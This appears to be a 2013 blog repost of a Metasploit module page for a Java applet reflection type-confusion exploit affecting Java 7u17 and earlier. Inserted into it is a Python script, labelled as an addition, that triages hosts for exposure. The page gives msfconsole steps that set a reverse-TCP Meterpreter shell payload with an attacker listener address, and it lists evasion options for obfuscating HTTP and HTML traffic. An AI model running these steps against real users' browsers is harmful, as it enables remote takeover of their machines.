Saturday, April 27, 2013

Java Applet Reflection Type Confusion Remote Code Execution

http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_reflection_types

This module abuses Java Reflection to produce a type confusion, caused by weak access control when setting final fields on static classes, and uses it to run code outside the Java sandbox. The vulnerability affects Java version 7u17 and earlier. The exploit bypasses click-to-play through a specially crafted JNLP file. This bypass applies mainly to IE, where Java Web Start can be launched automatically through the ActiveX control; otherwise the applet is launched without the click-to-play bypass.
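As an added example (not part of the module page or of the Metasploit project's own code): a Python helper that classifies Java version strings against the affected range stated above, so an endpoint inventory can be triaged for exposure. It assumes the legacy `java.version` format (`1.7.0_NN`, as printed by `java -version`); the host list and its outputs are constructed sample data. Java 6 and older are reported separately, because the description only states the 7u17 cut-off for Java 7.

```python
import re

# Affected range stated by the module description: Java 7 Update 17 and earlier.
LAST_AFFECTED_UPDATE = 17

# java.version strings for Java 5 through 8 look like "1.7.0_17", optionally
# followed by a qualifier such as "-ea". Java 9+ dropped the "1." prefix and
# is not handled here (it is far outside the affected range anyway).
_VERSION_RE = re.compile(r"^1\.(?P<family>\d+)\.0(?:_(?P<update>\d+))?(?:-\w+)?$")

# `java -version` prints the version string on its first line, in quotes.
_OUTPUT_RE = re.compile(r'java version "([^"]+)"')


def parse_java_version(version):
    """Return (family, update) for a java.version string, or None if it does
    not match the legacy 1.x.0_NN scheme."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        return None
    return int(m.group("family")), int(m.group("update") or 0)


def version_from_java_output(text):
    """Extract the quoted version string from `java -version` output."""
    m = _OUTPUT_RE.search(text)
    return m.group(1) if m else None


def classify(version):
    """Map a java.version string to an exposure verdict for this module."""
    parsed = parse_java_version(version)
    if parsed is None:
        return "unparsed"
    family, update = parsed
    if family == 7:
        return "affected" if update <= LAST_AFFECTED_UPDATE else "patched"
    if family < 7:
        # The page only gives the 7u17 cut-off for Java 7; Java 6 and older
        # are not covered by this check and should be reviewed separately.
        return "pre-7"
    return "not-affected"


def triage(inventory):
    """inventory: iterable of (host, `java -version` output) pairs.
    Returns a dict mapping host -> verdict."""
    verdicts = {}
    for host, output in inventory:
        version = version_from_java_output(output)
        verdicts[host] = classify(version) if version else "unparsed"
    return verdicts


# Constructed sample inventory (hypothetical hosts, not real data).
SAMPLE_INVENTORY = [
    ("ws-01", 'java version "1.7.0_17"\nJava(TM) SE Runtime Environment (build 1.7.0_17-b02)'),
    ("ws-02", 'java version "1.7.0_21"\nJava(TM) SE Runtime Environment (build 1.7.0_21-b11)'),
    ("ws-03", 'java version "1.6.0_45"\nJava(TM) SE Runtime Environment (build 1.6.0_45-b06)'),
    ("ws-04", "bash: java: command not found"),
]

if __name__ == "__main__":
    for host, verdict in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host}: {verdict}")
```

Feed `triage` the captured output of `java -version` from each host (for example collected by a configuration-management run); hosts reported as `affected` still run a JRE within the range the module targets.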

Exploit Rank

  • Excellent

Exploit Authors

  • Jeroen Frijters
  • juan vazquez < juan.vazquez [at] metasploit.com >

Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows x86 (Native Payload)
  • 2 - Mac OS X x86 (Native Payload)
  • 3 - Linux x86 (Native Payload)

Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/multi/browser/java_jre17_reflection_types
msf exploit(java_jre17_reflection_types) > show payloads
msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_reflection_types) > exploit

Exploit Module Options

  • SRVHOST: The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0)
  • SRVPORT: The local port to listen on. (default: 8080)
  • SSL: Negotiate SSL for incoming connections
  • SSLCert: Path to a custom SSL certificate (default is randomly generated)
  • SSLVersion: Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
  • URIPATH: The URI to use for this exploit (default is random)
  • ContextInformationFile: The information file that contains context information
  • DisablePayloadHandler: Disable the handler code for the selected payload
  • EXE::Custom: Use a custom exe instead of automatically generating a payload exe
  • EXE::FallBack: Use the default template in case the specified one is missing
  • EXE::Inject: Set to preserve the original EXE function
  • EXE::OldMethod: Set to use the substitution EXE generation method
  • EXE::Path: The directory in which to look for the executable template
  • EXE::Template: The executable template file name
  • EnableContextEncoding: Use transient context when encoding payloads
  • ListenerComm: The specific communication channel to use for this service
  • VERBOSE: Enable detailed status messages
  • WORKSPACE: Specify the workspace for this module
  • HTML::base64: Enable HTML obfuscation via an embedded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection)
  • HTML::javascript::escape: Enable HTML obfuscation via HTML escaping (number of iterations)
  • HTML::unicode: Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
  • HTTP::chunked: Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
  • HTTP::compression: Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
  • HTTP::header_folding: Enable folding of HTTP headers
  • HTTP::junk_headers: Enable insertion of random junk HTTP headers
  • HTTP::server_name: Configures the Server header of all outgoing replies
  • TCP::max_send_size: Maximum TCP segment size (0 = disable)
  • TCP::send_delay: Delay inserted before every send (0 = disable)
